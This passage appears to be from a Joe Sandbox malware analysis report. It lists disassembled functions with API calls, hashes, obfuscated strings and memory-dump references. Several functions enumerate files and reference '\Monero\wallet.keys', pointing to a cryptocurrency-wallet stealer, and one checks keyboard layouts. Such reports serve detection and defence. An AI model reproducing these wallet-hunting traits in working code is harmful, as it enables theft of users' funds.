                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                            • Instruction ID: dd5abab29a256707da7e3d01b0d806f1a0b2d88a2566d3903675d3c9eb215ac1
                            • Opcode Fuzzy Hash: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                            • Instruction Fuzzy Hash: B5122E719211189BCF59FBA0CD96AEE73BEAF14300F40419DA50A66491EF306F8ACFD5
                            Function 0068DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006A0C2E), ref: 0068DE5E
                            • StrCmpCA.SHLWAPI(?,006A14C8), ref: 0068DEAE
                            • StrCmpCA.SHLWAPI(?,006A14CC), ref: 0068DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0068E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                            • Instruction ID: a064995e11bd5dcad4dca91cc9772bf8e2f66b664f196283bacb1ed496496c92
                            • Opcode Fuzzy Hash: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                            • Instruction Fuzzy Hash: A2F19E718201289ADF59FBA0CD95EEE73BEBF15300F40419DA40A66491EF306F4ACFA5
                            Function 0068DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A14B0,006A0C2A), ref: 0068DAEB
                            • StrCmpCA.SHLWAPI(?,006A14B4), ref: 0068DB33
                            • StrCmpCA.SHLWAPI(?,006A14B8), ref: 0068DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0068DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                            • Instruction ID: 1885f702fde1be2ad21e59c5c9d8e0cb1d97975ab39737c25087decee4ae7074
                            • Opcode Fuzzy Hash: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                            • Instruction Fuzzy Hash: 9B91247691010897CF54FBF0ED56DED73BEAB84304F40865CF90A9A581EE349B098BE6
                            Function 00A41B96 Relevance: 11.6, Strings: 8, Instructions: 1610COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &@_$Q+^$l275$zDo$|+%o$}B]$MQu$l=
                            • API String ID: 0-2462393236
                            • Opcode ID: dce029451645033dca21ded304a7c77f8eda77927f3e4de3f032f8365a1a2b95
                            • Instruction ID: c81ec145fd46ed5c0fe5fb35de4cfb1285e554ce3bd2812bba654f190c555774
                            • Opcode Fuzzy Hash: dce029451645033dca21ded304a7c77f8eda77927f3e4de3f032f8365a1a2b95
                            • Instruction Fuzzy Hash: 65B226F36082049FE704AE2DEC8567AB7E5EF94320F1A853DEAC5C3744EA3598058797
                            Function 00A3959F Relevance: 11.6, Strings: 8, Instructions: 1592COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %p]$>.k:$G`SO$Tzu?$bgg$nYw$oHm$wU~
                            • API String ID: 0-3825258456
                            • Opcode ID: c5a35523ff53bd509feafa1e65edd5b03add1b584f334c89b9564514d3ba5d41
                            • Instruction ID: afee47ddc9f77d99794ddb2614dc64b4d3e2a6095202be5dffb6e715fb9e7c4d
                            • Opcode Fuzzy Hash: c5a35523ff53bd509feafa1e65edd5b03add1b584f334c89b9564514d3ba5d41
                            • Instruction Fuzzy Hash: A7B204B3A0C2049FE304AE2DEC8566AFBE9EF94720F16493DE6C4C3744E63598458797
                            Function 00A44FE3 Relevance: 11.6, Strings: 8, Instructions: 1569COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %hAD$F~$SRy$c/g$i|%m$&=$>iV$4
                            • API String ID: 0-4117549361
                            • Opcode ID: 03ecc88c491178b53ead6c2e69c26a270f4ae5a95742527fdc7c88b9d727b9a6
                            • Instruction ID: a29e5cf929db4afdd57c073f15bab740a0ba17e8852c09299df1d8235dacffb7
                            • Opcode Fuzzy Hash: 03ecc88c491178b53ead6c2e69c26a270f4ae5a95742527fdc7c88b9d727b9a6
                            • Instruction Fuzzy Hash: C3B217F3A0C2049FE304AF2DEC8567ABBE9EF94720F1A492DE6C5C7344E63558058693
                            Function 00A48535 Relevance: 11.5, Strings: 8, Instructions: 1493COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: BBn$Ben$Q@7_$W-6T$X@m:$hV |$oH_O$W{
                            • API String ID: 0-1066827417
                            • Opcode ID: 59acf40cde368ac9c683a9f2a9c195d21e55a543c2e3d4946f5d3e0e2948ad1a
                            • Instruction ID: 78db22a519cc885052c5cb5d2e3de94d739e275ddfe9fefad9b41bfa6ef18993
                            • Opcode Fuzzy Hash: 59acf40cde368ac9c683a9f2a9c195d21e55a543c2e3d4946f5d3e0e2948ad1a
                            • Instruction Fuzzy Hash: C9A204F360C214AFE304AE2DDC8577ABBE9EF94720F16493DEAC4C7744E63598008696
                            Function 00697B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,006A05AF), ref: 00697BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00697BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00697C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00697C62
                            • LocalFree.KERNEL32(00000000), ref: 00697D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                            • Instruction ID: 24adfabde122e360de14caccf88316785634ff75ce80814485fccab7ed03b875
                            • Opcode Fuzzy Hash: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                            • Instruction Fuzzy Hash: A9416C71911218ABDF24DB94DC99FEEB3B9FF44700F204199E00962680DB342F86CFA5
                            Function 00A37A93 Relevance: 10.4, Strings: 7, Instructions: 1652COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 22y$>ob~$OM$VT{$XVL$]e[?$is
                            • API String ID: 0-3334281120
                            • Opcode ID: e0cf282e30779b72b22697b48149bc39262f3d099452ce0286a83b6e1e7cf194
                            • Instruction ID: 2ac703b5c9357b42efaae56867ee4c41c163a8f4d94018f07eeae8ed2b64b290
                            • Opcode Fuzzy Hash: e0cf282e30779b72b22697b48149bc39262f3d099452ce0286a83b6e1e7cf194
                            • Instruction Fuzzy Hash: 14B23AF3A082049FE704AE2DDC8567AFBE5EF94720F1A8A3DEAC4C7744E53558058693
                            Function 00A403B9 Relevance: 10.1, Strings: 7, Instructions: 1316COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: M~?$*5<$:%o~$B9?$E%4~$W[n$ft_
                            • API String ID: 0-1282150103
                            • Opcode ID: 7145d1413bb1853cbbf84af90762e7b546f60cbec85c52bbfa1ee4bb7ebc4bb5
                            • Instruction ID: a5af8239ad48a1ae44cd5502abfb3b6e5cf1bb660d72393c9c1057bcdf7822d0
                            • Opcode Fuzzy Hash: 7145d1413bb1853cbbf84af90762e7b546f60cbec85c52bbfa1ee4bb7ebc4bb5
                            • Instruction Fuzzy Hash: C89215F390C204AFE3046F29EC8567AFBE9EF94320F16892DEAC583744EA3558158757
                            Function 0068E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006A0D73), ref: 0068E4A2
                            • StrCmpCA.SHLWAPI(?,006A14F8), ref: 0068E4F2
                            • StrCmpCA.SHLWAPI(?,006A14FC), ref: 0068E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
